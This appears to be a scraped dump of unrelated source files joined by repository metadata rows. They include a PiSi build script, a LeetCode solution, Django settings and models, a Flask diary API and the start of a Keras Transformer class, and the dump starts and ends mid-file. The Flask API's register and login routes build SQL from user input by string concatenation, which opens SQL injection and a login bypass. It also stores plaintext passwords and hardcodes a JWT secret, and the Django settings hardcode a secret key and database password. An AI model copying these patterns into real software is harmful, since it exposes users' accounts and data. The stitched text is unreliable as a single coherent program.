pisitools.dosed("configure", "-faltivec")
autotools.configure('--with-audio="alsa oss" \
--with-cpu=sse \
--with-optimization=2')
def build():
autotools.make()
def install():
autotools.install()
pisitools.dodoc("ChangeLog","COPYING","NEWS", "README", "AUTHORS")
| [
"[email protected]"
] | |
749a22b88ff6059b07d70cf09630e298bc448a80 | c0c2cd59aedc9a9807d489b90874b5b454827061 | /leetcode/binarysearch/729.py | e2f2a1386b6229d0491efcd59a4abac0b5e92216 | [] | no_license | flyfatty/PythonTutorial | ce2ee3caf5e3f2428329f63713b1e6a655dba183 | d12021f8a078d62510bb40083ed1ea81af718df9 | refs/heads/master | 2023-05-08T14:48:50.998595 | 2021-05-07T15:43:13 | 2021-05-07T15:43:13 | 309,847,416 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,740 | py | # @Time : 2020/9/26 22:16
# @Author : LiuBin
# @File : 729.py
# @Description :
# @Software: PyCharm
"""我的日程安排表 I
关键字: 二分查找
目标:每次申请一个区间,如果区间出现重叠返回False,否则开辟区间并返回True
思路:
1、二分查找,维护每个区间start的有序列表
2、使用字典维护start:end。如果能进入start列表,一定满足 i+1的start>=i的end(左闭右开)
3、找出所有重叠的情况,剩下的就可以加入start列表,并且更新字典
"""
class MyCalendar:
def __init__(self):
self.map = dict()
self.slist = list()
def binary_search(self, n, s, e):
if s >= e:
return s
m = (s + e) >> 1
if self.slist[m] > n:
return self.binary_search(n, s, m)
elif self.slist[m] < n:
return self.binary_search(n, m + 1, e)
else:
return m
def book(self, start: int, end: int) -> bool:
idx = self.binary_search(start, 0, len(self.slist))
if self.slist:
if idx >= len(self.slist):
if self.map[self.slist[idx - 1]] > start:
return False
else:
if self.slist[idx] == start or end > self.slist[idx] or idx - 1 >= 0 and self.map[
self.slist[idx - 1]] > start:
return False
self.slist.insert(idx, start)
self.map[start] = end
return True
if __name__ == '__main__':
ins = MyCalendar()
print(ins.book(4, 10))
print(ins.book(0, 2))
print(ins.book(3, 4))
# print(ins.book(9, 13))
# print(ins.book(13, 14))
# print(ins.book(0, 14))
print(ins.slist, ins.map)
| [
"[email protected]"
] | |
7ecc0aa792f338d0d49f24a3f18c7b94177b9e5a | 76fefdb20c453e830b8db86f32a1b42d79108cdd | /chat/settings.py | b541d5cf7bea3e72bc2a2d4b3ef21353ce88bcf6 | [] | no_license | Belie06Loryn/chaty-final-master | 35f6762e9bf45e1086db6280cd0bd7dc0828fb96 | 86e839c069eb54dad3390e84c6b7534d165a3942 | refs/heads/master | 2022-12-09T14:31:19.478090 | 2019-12-08T16:00:45 | 2019-12-08T16:00:45 | 226,365,156 | 0 | 0 | null | 2022-12-08T06:59:44 | 2019-12-06T16:08:51 | Python | UTF-8 | Python | false | false | 4,112 | py | """
Django settings for chat project.
Generated by 'django-admin startproject' using Django 2.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
from decouple import config
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '&$20_3$3wnb=p(kmmu!d*22+bt*6p3fawj5c(2724c(ny+w@yc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'dashboardapp',
'bootstrap4',
'crispy_forms',
'jet.dashboard',
'jet',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'channels',
'convos',
'bootstrap3',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'chat.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'chat.wsgi.application'
# ASGI CONFIG
ASGI_APPLICATION = "chat_ws.routing.application"
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {
"hosts": ['redis://localhost:6379'],
},
},
}
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'dashboard',
'USER': 'alexie',
'PASSWORD':'root',
}
}
SITE_ID = 1
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LOGOUT_REDIRECT_URL = '/'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
MEDIA_URL='/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
JET_DEFAULT_THEME = 'green'
JET_SIDE_MENU_COMPACT = True
# Email configurations remember to install python-decouple
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = config('EMAIL_USE_TLS')
EMAIL_HOST = config('EMAIL_HOST')
EMAIL_PORT = config('EMAIL_PORT')
EMAIL_HOST_USER = config('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = config('EMAIL_HOST_PASSWORD') | [
"[email protected]"
] | |
8a2a3a42acd557a574c3d3d292a46fbdbd4e4e45 | 1d0f579b0c43df9352dd2d9eea2897fa5d5d186f | /task/project/server/models.py | 6b2c4b312af9367dbe065001bcad36594c8bf575 | [] | no_license | mohiuddin89/all-service | 3c82d39c5860d3455a758d22f131079b51206752 | 0dcf7d6c8be8202bf86935245e8868285c2e105e | refs/heads/master | 2023-07-16T05:28:34.146458 | 2021-08-22T23:57:45 | 2021-08-22T23:57:45 | 398,889,765 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 15,336 | py | from datetime import datetime
from datetime import timedelta
from project.server import app, db, bcrypt
import jwt
class User(db.Model):
__tablename__ = "users"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
registered_on = db.Column(db.DateTime, nullable=True)
first_name = db.Column(db.String(255), unique=False, nullable=True)
last_name = db.Column(db.String(255), unique=False, nullable=True)
phone_number = db.Column(db.String(20), unique=False, nullable=False)
nid = db.Column(db.String(255), nullable=True)
profile_photo = db.Column(db.String(255), nullable=True)
email = db.Column(db.String(255), nullable=True)
designation = db.Column(db.String(255), nullable=True)
department = db.Column(db.String(255), nullable=True)
member_type = db.Column(db.Integer, nullable=False)
company_id = db.Column(db.Integer, nullable=False)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, company_id, phone_number, first_name='', last_name='', nid='', profile_photo='', member_type=''):
self.company_id = company_id
self.first_name = first_name
self.last_name = last_name
self.phone_number = phone_number
self.nid = nid
self.profile_photo = profile_photo
self.registered_on = datetime.utcnow()
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
self.member_type = member_type
def encode_auth_token(self, user_id, modules):
user_details = User.query.filter_by(id=user_id).first()
try:
payload = {
'exp': datetime.utcnow() + timedelta(days=7),
'iat': datetime.utcnow(),
'sub': user_id,
'modules': modules,
'user_type': 'General',
'name': user_details.first_name + ' ' + user_details.last_name,
'phone_number': user_details.phone_number,
'member_type': user_details.member_type
}
token = jwt.encode(
payload,
app.config.get('SECRET_KEY'),
algorithm='HS256'
)
return token
except Exception as e:
return e
@staticmethod
def decode_auth_token(auth_token):
try:
payload = jwt.decode(auth_token, app.config.get('SECRET_KEY'))
is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)
if is_blacklisted_token:
return 'Token blacklisted. Please log in again.'
else:
return payload['sub']
except jwt.ExpiredSignatureError:
return 'Signature expired. Please log in again.'
except jwt.InvalidTokenError:
return 'Invalid token. Please log in again.'
class DashboardUser(db.Model):
__tablename__ = "dashboard_users"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
email = db.Column(db.String(255), unique=True, nullable=False)
password = db.Column(db.String(255), nullable=False)
registered_on = db.Column(db.DateTime, nullable=False)
username = db.Column(db.String(255), unique=True, nullable=False)
first_name = db.Column(db.String(255), unique=False, nullable=False)
last_name = db.Column(db.String(255), unique=False, nullable=False)
phone_number = db.Column(db.String(20), unique=False, nullable=True)
designation = db.Column(db.String(255), nullable=True)
department = db.Column(db.String(255), nullable=True)
nid = db.Column(db.String(255), nullable=True)
profile_photo = db.Column(db.String(255), nullable=True)
company_id = db.Column(db.String(255), nullable=False)
member_type = db.Column(db.Integer, nullable=False)
def __init__(self, email, password, username, first_name, last_name, company_id, phone_number='', nid='', profile_photo='', member_type=''):
self.email = email
self.password = bcrypt.generate_password_hash(
password, app.config.get('BCRYPT_LOG_ROUNDS')
).decode()
self.registered_on = datetime.now()
self.username = username
self.first_name = first_name
self.last_name = last_name
self.company_id = company_id
self.phone_number = phone_number
self.nid = nid
self.profile_photo = profile_photo
self.member_type = member_type
def encode_auth_token(self, user_id):
user_details = DashboardUser.query.filter_by(id=user_id).first()
try:
payload = {
'exp': datetime.utcnow() + timedelta(days=0, seconds=3600),
'iat': datetime.utcnow(),
'sub': user_id,
'user_type': 'Dashboard',
'name': user_details.first_name + ' ' + user_details.last_name,
'email': user_details.email,
'member_type': user_details.member_type
}
token = jwt.encode(
payload,
app.config.get('SECRET_KEY'),
algorithm='HS256'
)
return token
except Exception as e:
return e
@staticmethod
def decode_auth_token(auth_token):
try:
payload = jwt.decode(auth_token, app.config.get('SECRET_KEY'))
is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)
if is_blacklisted_token:
return 'Token blacklisted. Please log in again.'
else:
return payload['sub']
except jwt.ExpiredSignatureError:
return 'Signature expired. Please log in again.'
except jwt.InvalidTokenError:
return 'Invalid token. Please log in again.'
class Companies(db.Model):
__tablename__ = "companies"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
name = db.Column(db.String(255), unique=True, nullable=False)
address = db.Column(db.String(255), nullable=False)
agreement_file = db.Column(db.String(255), nullable=True)
verification_file = db.Column(db.String(255), nullable=True)
tin = db.Column(db.String(255), unique=False, nullable=False)
def __init__(self, name, address, tin, agreement_file='', verification_file=''):
self.name = name
self.address = address
self.agreement_file = agreement_file
self.verification_file = verification_file
self.tin = tin
class CompanyPanel(db.Model):
__tablename__ = "company_dashboard_users"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
dashboard_user_id = db.Column(db.Integer(), nullable=False)
company_id = db.Column(db.Integer(), nullable=False)
def __init__(self, dashboard_user_id, company_id):
self.dashboard_user_id = dashboard_user_id
self.company_id = company_id
class CompanyUsers(db.Model):
__tablename__ = "company_general_users"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
company_id = db.Column(db.Integer(), nullable=False)
user_id = db.Column(db.Integer(), nullable=False)
def __init__(self, company_id, user_id):
self.company_id = company_id
self.user_id = user_id
class Module(db.Model):
__tablename__ = 'modules'
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
name = db.Column(db.String(50), unique=False)
def __init__(self, name):
self.name = name
class UserModule(db.Model):
__tablename__ = 'user_modules'
id = db.Column(db.Integer(), primary_key=True)
user_id = db.Column(db.Integer(), db.ForeignKey('users.id', ondelete='CASCADE'))
module_id = db.Column(db.Integer(), db.ForeignKey('modules.id', ondelete='CASCADE'))
class BlacklistToken(db.Model):
__tablename__ = 'blacklist_tokens'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
token = db.Column(db.String(500), unique=True, nullable=False)
blacklisted_on = db.Column(db.DateTime, nullable=False)
def __init__(self, token):
self.token = token
self.blacklisted_on = datetime.now()
def __repr__(self):
return '<id: token: {}'.format(self.token)
@staticmethod
def check_blacklist(auth_token):
res = BlacklistToken.query.filter_by(token=str(auth_token)).first()
if res:
return True
else:
return False
class Albums(db.Model):
__tablename__ = "albums"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
field_attendence_id = db.Column(db.Integer(), nullable=False)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, field_attendence_id=''):
self.field_attendence_id = field_attendence_id
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class TaskAlbums(db.Model):
__tablename__ = "task_albums"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
task_id = db.Column(db.Integer(), nullable=False)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, task_id=''):
self.task_id = task_id
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class FieldAttendance(db.Model):
__tablename__ = "field_attendence"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
title = db.Column(db.String(255), nullable=False)
assigned_time = db.Column(db.String(255), nullable=False)
assigned_location_lattitude = db.Column(db.String(255), nullable=False)
assigned_location_longitude = db.Column(db.String(255), nullable=False)
address = db.Column(db.String(255), nullable=False)
admin_id = db.Column(db.Integer(), nullable=False)
attendence_time = db.Column(db.String(255), nullable=True)
attendence_location_lattitude = db.Column(db.String(255), nullable=True)
attendence_location_longitude = db.Column(db.String(255), nullable=True)
attendence_status = db.Column(db.Boolean(), nullable=True)
comment = db.Column(db.String(255), nullable=True)
user_id = db.Column(db.Integer(), nullable=True)
album_id = db.Column(db.Integer(), nullable=True)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, title, assigned_time, assigned_location_lattitude, assigned_location_longitude, address, admin_id):
self.title = title
self.assigned_time = assigned_time
self.assigned_location_lattitude = assigned_location_lattitude
self.assigned_location_longitude = assigned_location_longitude
self.address = address
self.admin_id = admin_id
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class Photos(db.Model):
__tablename__ = "photos"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
album_id = db.Column(db.Integer(), nullable=False)
photo_url = db.Column(db.String(255), nullable=False)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, album_id='', photo_url=''):
self.album_id = album_id
self.photo_url = photo_url
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class TaskPhotos(db.Model):
__tablename__ = "task_photos"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
album_id = db.Column(db.Integer(), nullable=False)
photo_url = db.Column(db.String(255), nullable=False)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, album_id='', photo_url=''):
self.album_id = album_id
self.photo_url = photo_url
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class Services(db.Model):
__tablename__ = "services"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
name = db.Column(db.String(255), nullable=False)
service_type = db.Column(db.String(255), nullable=True)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, name='', service_type=''):
self.name = name
self.service_type = service_type
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class CompanyServices(db.Model):
__tablename__ = "company_services"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
company_id = db.Column(db.Integer(), nullable=False)
service_id = db.Column(db.Integer(), nullable=False)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, company_id='', service_id=''):
self.company_id = company_id
self.service_id = service_id
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
class TaskService(db.Model):
__tablename__ = "task_service"
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
title = db.Column(db.String(255), nullable=False)
is_paid = db.Column(db.Boolean(), nullable=False)
payment_status = db.Column(db.Boolean(), nullable=False)
assigned_time = db.Column(db.String(255), nullable=False)
assigned_location_lattitude = db.Column(db.String(255), nullable=False)
assigned_location_longitude = db.Column(db.String(255), nullable=False)
assigned_address = db.Column(db.String(255), nullable=False)
admin_id = db.Column(db.Integer(), nullable=False)
user_id = db.Column(db.Integer(), nullable=False)
task_complete_time = db.Column(db.String(255), nullable=True)
task_complete_location_lattitude = db.Column(db.String(255), nullable=True)
task_complete_location_longitude = db.Column(db.String(255), nullable=True)
task_complete_status = db.Column(db.Boolean(), nullable=True)
bill_amount = db.Column(db.Float(), nullable=True)
billing_address = db.Column(db.String(255), nullable=True)
notes = db.Column(db.String(255), nullable=True)
album_id = db.Column(db.Integer(), nullable=True)
createdAt = db.Column(db.DateTime, nullable=False)
updatedAt = db.Column(db.DateTime, nullable=False)
def __init__(self, title, is_paid, bill_amount, assigned_time, assigned_location_lattitude, assigned_location_longitude, assigned_address, admin_id, user_id, payment_status=False):
self.title = title
self.is_paid = is_paid
self.bill_amount = bill_amount
self.assigned_time = assigned_time
self.assigned_location_lattitude = assigned_location_lattitude
self.assigned_location_longitude = assigned_location_longitude
self.assigned_address = assigned_address
self.admin_id = admin_id
self.user_id = user_id
self.payment_status = payment_status
self.createdAt = datetime.utcnow()
self.updatedAt = datetime.utcnow()
| [
"[email protected]"
] | |
09a091a0e2ab51c169b7e4d08aeda7a3f8f30405 | c608cdf1ca2e3eccc0f7cf78e9de9c4ddfb9b3da | /name/home/models.py | 752998b39d4cfece09d8a33d1b5fe608d4c660f7 | [] | no_license | Mrunmayi28/python_miniproject | 28b6f5a52a2cc33318f802e083a994cb7dc3324d | 1cd86a4bce9652f64df5f93acd70fb9392f9f47f | refs/heads/main | 2023-04-28T09:07:53.219463 | 2021-05-22T03:47:20 | 2021-05-22T03:47:20 | 362,070,542 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,086 | py | from django.db import models
import datetime
# Create your models here.
class certi(models.Model):
internship = models.FileField(null = True)
course = models.FileField(null = True)
class Meta:
db_table = "Certis"
class formed(models.Model):
Name = models.CharField(max_length=30)
Contact=models.CharField(max_length=40)
email=models.EmailField()
class Meta:
db_table = "Formeds"
class academy(models.Model):
cgpa = models.TextField(max_length=70)
percentage = models.TextField(max_length=70)
subject1 = models.TextField(max_length=70)
subject2 = models.TextField(max_length=70)
subject3 = models.TextField(max_length=70)
subject4 = models.TextField(max_length=70)
subject5 = models.TextField(max_length=70)
kt = models.TextField(max_length=70)
class stu_info(models.Model):
idNumber = models.IntegerField()
roll = models.IntegerField()
department = models.CharField(max_length=10)
student_name = models.CharField(max_length=10)
father_name = models.CharField(max_length=10)
mother_name = models.CharField(max_length=10)
last_name = models.CharField(max_length=10)
photo = models.FileField(null = True)
sign = models.FileField(null = True)
dob = models.DateField()
student_email = models.EmailField()
phone = models.IntegerField()
completion_year = models.IntegerField()
current_year =models.TextField(max_length=50)
address = models.CharField(max_length=20)
country = models.CharField(max_length=10)
state = models.CharField(max_length=15)
district = models.CharField(max_length=10)
email_mother = models.EmailField()
email_father = models.EmailField()
number_father = models.IntegerField()
number_mother = models.IntegerField()
designation_mother = models.CharField(max_length=20)
designation_father = models.CharField(max_length=20)
class Meta:
db_table = "Stu_infos"
class student_add(models.Model):
name = models.CharField(max_length=100)
number = models.CharField(max_length=70) | [
"[email protected]"
] | |
28f5b28f72d29de1b5062844e7ad55ba0db84303 | 980413945d70cda1292c10af44a4bf89fa259d0b | /wikpy/tests/functional/test_edit.py | 0c53576b989a6ef14961867595bb581b916b9eb9 | [] | no_license | seken/wikpy | bef3478c9332c95e83ed19d94b3f38c96734e4e7 | c6a562b9219e0a6840b61692530accea7b453f84 | refs/heads/master | 2016-09-08T01:47:13.593281 | 2010-07-30T15:15:56 | 2010-07-30T15:15:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 195 | py | from wikpy.tests import *
class TestEditController(TestController):
def test_index(self):
response = self.app.get(url(controller='edit', action='index'))
# Test response...
| [
"[email protected]"
] | |
208c84e4aba70c4b36e817babaee830f1ec6815a | 5bb85daa020b49dd0fd68944b201832c9555e467 | /examplescripts/timed.py | d4c8048cbdb91e3396d0f5f91c8c7d1d7222fa77 | [] | no_license | krljg/lsystem | 48a9280455cc9f9e771716628fdc616c9565ae44 | 1851bc2abcc2f067321670725b21a4a492cc4323 | refs/heads/master | 2022-10-06T02:19:03.644769 | 2022-09-04T08:04:20 | 2022-09-04T08:04:20 | 71,384,970 | 55 | 12 | null | 2022-09-04T08:04:21 | 2016-10-19T17:58:40 | Python | UTF-8 | Python | false | false | 259 | py | # Make an l-system with a "time" parameter and a "detail" parameter
# For each "time" step the lsystem has to do a predetermined number of "detail" iterations
import lsystem.exec
import mathutils
ex = lsystem.exec.Exec()
# todo
ex.exec(min_iterations=11)
| [
"[email protected]"
] | |
65dbcdd84743cd1e9d6acd3f168c589746ff3cfc | bc94fe84534a906e20f3aa3910eda2b010cab2ff | /app/app.py | ce927b7acbc1e53bee151f78c99f5aa0603ca277 | [] | no_license | Krafty-Coder/MyDiary | b94cf4a5e304033b36aae4a878c44301279613cb | b53fd97b30f2a16d1faa0f23b3a06c36b3c3278d | refs/heads/master | 2020-04-01T20:44:39.980858 | 2018-07-26T09:37:35 | 2018-07-26T09:37:35 | 153,618,550 | 0 | 1 | null | 2018-10-18T12:15:38 | 2018-10-18T12:15:37 | null | UTF-8 | Python | false | false | 5,060 | py | """Import flask modules"""
from flask import Flask, jsonify, request
from flask_jwt_extended import (
JWTManager, jwt_required, create_access_token
)
from app.models import *
app = Flask(__name__)
app .config['JWT_SECRET_KEY'] = '5c750c0e72ce5394dfe7720fa26d0327d616ff9ff869be19'
jwt = JWTManager(app)
@app.route('/', methods=['GET'])
def index():
return jsonify("Welcome to mydiary")
@app.route('/api/v1/auth/register', methods=['POST'])
def register():
"""This is a function for registering a user"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
username = request.get_json()['username']
email = request.get_json()['email']
password = request.get_json()['password']
password_confirmation = request.get_json()['password_confirmation']
try:
cur.execute("INSERT INTO users (username, email, password, password_confirmation)\
VALUES('"+username+"', '"+email+"', '"+password+"', '"+password_confirmation+"');")
except:
return jsonify({'message': 'Try again'})
finally:
conn.commit()
return jsonify({'message': 'You are successfully registered!'})
@app.route('/api/v1/auth/login', methods=['POST'])
def login():
"""This is a function for user login"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
username = request.get_json()['username']
password = request.get_json()['password']
#user_info = []
cur.execute("SELECT * FROM users WHERE username LIKE '"+username+"'\
AND password LIKE '"+password+"'")
rows = cur.fetchone()
if rows is None:
return jsonify({'message': 'Not successful you can try again'})
else:
access_token = create_access_token(identity=username)
return jsonify(access_token=access_token)
conn.commit()
@app.route('/api/v1/entries', methods=['POST'])
@jwt_required
def create_entry():
"""This is a fuction for creating an entry"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
title = request.get_json()['title']
content = request.get_json()['content']
try:
cur.execute("INSERT INTO entries (title, content) VALUES('"+title+"', '"+content+"');")
return jsonify({'message': 'Not successfully try again!'})
except:
return jsonify({'message': 'Not successfully try again!'})
finally:
conn.commit()
return jsonify({'message': 'Entry successfully created!'}), 201
@app.route('/api/v1/entries', methods=['GET'])
@jwt_required
def get_all_entries():
"""This is a function for getting all entries"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
my_list = []
try:
cur.execute("SELECT * from entries")
rows = cur.fetchall()
for row in rows:
my_list.append(row[0])
my_list.append(row[1])
my_list.append(row[2])
except:
return jsonify({'message':'Cant retrieve entries'})
finally:
conn.close()
return jsonify(my_list)
@app.route('/api/v1/entries/<int:entry_id>', methods=['PUT'])
@jwt_required
def modify_entry(entry_id):
"""This is a function for viewing single entry"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
cur.execute("SELECT * FROM entries WHERE ID = %s", (entry_id,))
entry = cur.fetchone()
title = request.get_json()['title']
content = request.get_json()['content']
if entry is not None:
cur.execute("UPDATE entries SET title=%s, content=%s WHERE id=%s",\
(title, content, entry_id))
conn.commit()
return jsonify({'message': 'Entry successfully updated'}), 201
else:
return jsonify({'message': 'Not complete no entry'})
@app.route('/api/v1/entries/<int:entry_id>', methods=['GET'])
def view_entry(entry_id):
"""This is a function for viewing single entry"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
cur.execute("SELECT * FROM entries WHERE ID = %s", (entry_id,))
rows = cur.fetchall()
output = {}
for row in rows:
output.update({row[0]: row[1]})
conn.close()
return jsonify(output)
@app.route('/api/v1/entries/<int:entry_id>', methods=['DELETE'])
@jwt_required
def delete_entry(entry_id):
"""This is a function for deleting an entry"""
#conn = psycopg2.connect("dbname=diary user=postgres password=123456 host=localhost")
#cur = conn.cursor()
try:
cur.execute("DELETE FROM entries WHERE ID = %s", (entry_id,))
conn.commit()
except:
return jsonify({'message':'Cant retrieve entry'})
finally:
conn.close()
return jsonify({'message': 'successfully deleted'}), 204
if __name__ == '__main__':
app.run(debug=True)
| [
"[email protected]"
] | |
ba0de45e913c7aa7cd9d1b16355b5d5c78a42f58 | 1ce1e49412b34a235da0b6d9da0aed0e3f5cdbc1 | /blog/migrations/0001_initial.py | d4c3bc92bdce3564537f51c1056c176d20d77371 | [] | no_license | cu187008059/herokudjango | 5329f0e95823775932e70e0b5e4e795cb7fadac1 | fabd02dbd220ce677f2b476c2a96126ac29e1d0b | refs/heads/master | 2020-05-29T16:14:43.500253 | 2019-05-29T14:56:29 | 2019-05-29T14:56:29 | 189,243,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,597 | py | # Generated by Django 2.2.1 on 2019-05-21 16:32
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('body', models.TextField()),
('created_on', models.DateTimeField(auto_now_add=True)),
('last_modified', models.DateTimeField(auto_now=True)),
('categories', models.ManyToManyField(related_name='posts', to='blog.Category')),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.CharField(max_length=60)),
('body', models.TextField()),
('created_on', models.DateTimeField(auto_now_add=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Post')),
],
),
]
| [
"[email protected]"
] | |
707f2cddec7735eba3aa0bf8f99aacaa07dafec8 | d4ca3ed94bdd464fc07147c5bed169a10b7ba0e2 | /webke/models.py | 02e1d8ee082b3cf85a655cae078144bd0cd55583 | [] | no_license | microw/webke | b47dc838fda5df532e4f11c47ac530cc4cebdf7a | 4ceaca1198e4da2951614cb7cb38dc576b923eb6 | refs/heads/master | 2023-09-04T01:37:58.781735 | 2021-11-01T15:44:55 | 2021-11-01T15:44:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85,765 | py | #! -*- coding: utf-8 -*-
# 主要模型
import numpy as np
#from bert4keras.layers import *
from layers import *
from bert4keras.snippets import insert_arguments
from bert4keras.snippets import delete_arguments
from bert4keras.snippets import is_string, is_one_of
from keras.models import Model
import json
class Transformer(object):
"""模型基类
"""
def __init__(
self,
vocab_size, # 词表大小
hidden_size, # 编码维度
num_hidden_layers, # Transformer总层数
num_attention_heads, # Attention的头数
intermediate_size, # FeedForward的隐层维度
hidden_act, # FeedForward隐层的激活函数
dropout_rate=None, # Dropout比例
embedding_size=None, # 是否指定embedding_size
attention_head_size=None, # Attention中V的head_size
attention_key_size=None, # Attention中Q,K的head_size
sequence_length=None, # 是否固定序列长度
keep_tokens=None, # 要保留的词ID列表
compound_tokens=None, # 扩展Embedding
residual_attention_scores=False, # Attention矩阵加残差
ignore_invalid_weights=False, # 允许跳过不存在的权重
layers=None, # 外部传入的Keras层
prefix=None, # 层名前缀
name=None, # 模型名称
**kwargs
):
if keep_tokens is not None:
vocab_size = len(keep_tokens)
if compound_tokens is not None:
vocab_size += len(compound_tokens)
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.attention_head_size = attention_head_size or hidden_size // num_attention_heads
self.attention_key_size = attention_key_size or self.attention_head_size
self.intermediate_size = intermediate_size
self.dropout_rate = dropout_rate or 0
self.hidden_act = hidden_act
self.embedding_size = embedding_size or hidden_size
